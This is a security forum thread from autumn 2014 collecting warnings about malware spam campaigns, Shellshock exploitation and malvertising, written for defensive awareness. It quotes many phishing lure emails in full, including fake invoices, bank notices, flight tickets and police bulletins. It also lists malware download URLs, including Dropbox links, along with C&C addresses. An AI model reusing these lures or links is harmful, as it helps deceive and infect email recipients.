The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___
Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...
Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___
More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.
... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___
'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”
The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___
Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."
Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/
:fear: :mad:
AplusWebMaster
2014-09-30, 13:46
FYI...
Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:
NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___
Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.
30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/
:fear: :mad:
AplusWebMaster
2014-10-01, 13:51
FYI...
Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...
Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/
** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___
Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."
87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___
Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...
All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."
37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___
More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png
There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently, Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on yoiur antivirus to protect you from these types of malware
Todays Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___
Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
get copies of invoices. We will not be able to pay them. Please send clear invoices
1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___
GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___
DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/
*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/
:mad: :fear:
AplusWebMaster
2014-10-02, 13:58
FYI...
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-ids107587_815-fake-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Invoice-IDS107587_815.png
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake lawyer SPAM - PDF malware
- http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer
The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/41cf7ad7f6090e20412f05ef92b7b6a91499190a4ef4bc01fc52aac6cc7ed036/analysis/1412241170/
___
Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-94864-pm-shipping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...
The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...
2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f512adf0abfa86ce39d355b5c5f44be91d88012e9c3d6c2541d22c902eab4576/analysis/1412253608/
- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
___
Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-photos-insurance-company-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names ands email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file ( windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___
Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santander-new-edocument-arrived-fake-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/santander_statement.png
... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___
O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
['Still more XP users than Vista, Win8, and Win8.1 combined]
___
Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake-email-regarding-outstanding-amount-contains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice
This email is sent from a spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...
The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e09375d8ce97b76df1d2037a7f9511d5035a1bc35e87568995721349513386c7/analysis/1412243475/
The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD
The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/31ff7ccaae4f3fe15df8d52fe18e9017888ae13877eefbf9314e6d76cb32cefa/analysis/
:mad: :fear:
AplusWebMaster
2014-10-03, 14:54
FYI...
Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-transactions-report-users-2014-09-28-2014-09-28-fake-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:
Your requested report is attached here...
3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e836820d947de6da456a61b37f9c9cdf749a61211b52a51a2aef0aab5786239f/analysis/1412331282/
___
Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/thanks-for-shopping-with-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...
In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/file/7b255b6d648f670bd7ecbae80983230fedbce13cfcf2e93a0887fba53b5c42ad/analysis/1412334793/
___
Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-personal-reply-id-509359-word-doc-malware/
3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Office_macro.png
3October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/75fda9cc7d62d11e88ddfae10b094af5a46b87a838bbe45954cdb3c27d098b73/analysis/1412314059/
___
Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/malicious-adobe-invoice-doc-attached-to-fake-emails-adobe-creative-cloud-service-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is send from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service
Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif
The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
___
Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/securitylabs/archive/2014/10/01/malware-in-the-wild-abusing-shellshock-vulnerability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-address/208.118.61.44/information/
27.19.159.224: https://www.virustotal.com/en/ip-address/27.19.159.224/information/
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
212.227.251.139: https://www.virustotal.com/en/ip-address/212.227.251.139/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."
- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014
:fear::fear: :mad:
AplusWebMaster
2014-10-06, 15:15
FYI...
Fake Western Union invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/western-union-invoice-5751107-october-fake-pdf-malware/
6 Oct 2014 - "'invoice 5751107 October' pretending to come from Western Union Inc and quite a few others coming from a random single name like Amelia, Fred, John etc at random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8017730 Account No 5608017730.
Thanks very much
Western Union Inc. 2014 @ All rights reserved.
The earlier email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 5751107 Account No 5605751107.
Thanks very much
Amelia ...
6 October 2014: invoice_5751107.zip: Extracts to: invoice.0914.1602783433405300232.exe
Current Virus total detections: 9/55* . This invoice 5751107 October pretending to come from Western Union is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ce97ddc450b4aefc33e279992c2a201297d74eb56ff98f8ed188fa2c0990485b/analysis/1412589518/
___
Fake Bank confirmation SPAM - PDF malware
- http://myonlinesecurity.co.uk/chen-young-bank-swift-fake-pdf-malware/
6 Oct 2014 - "'CHEN YOUNG BANK SWIFT' pretending to come from CHEN YOUNG is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
My bank have made the payment and the funds will arrive your bank in 3 days time. Attached is the bank confirmation Swift, let me know if your bank details are ok in the SWIFT
Thank you!
Chen Young
Branch Manager
YangZhou Wells Imp&Exp Co., Ltd
9-525 Modern Square,
Wenhui West Road
Yangzhou, Jiangsu. CHINA
Fax: 0086 514 8795 1721 / 0086 514 8795 1752
6 October 2014: SWIFT_0000019989399188321110000011.zip:
Extracts to: SWIFT_000001998939918835961163324799.exe
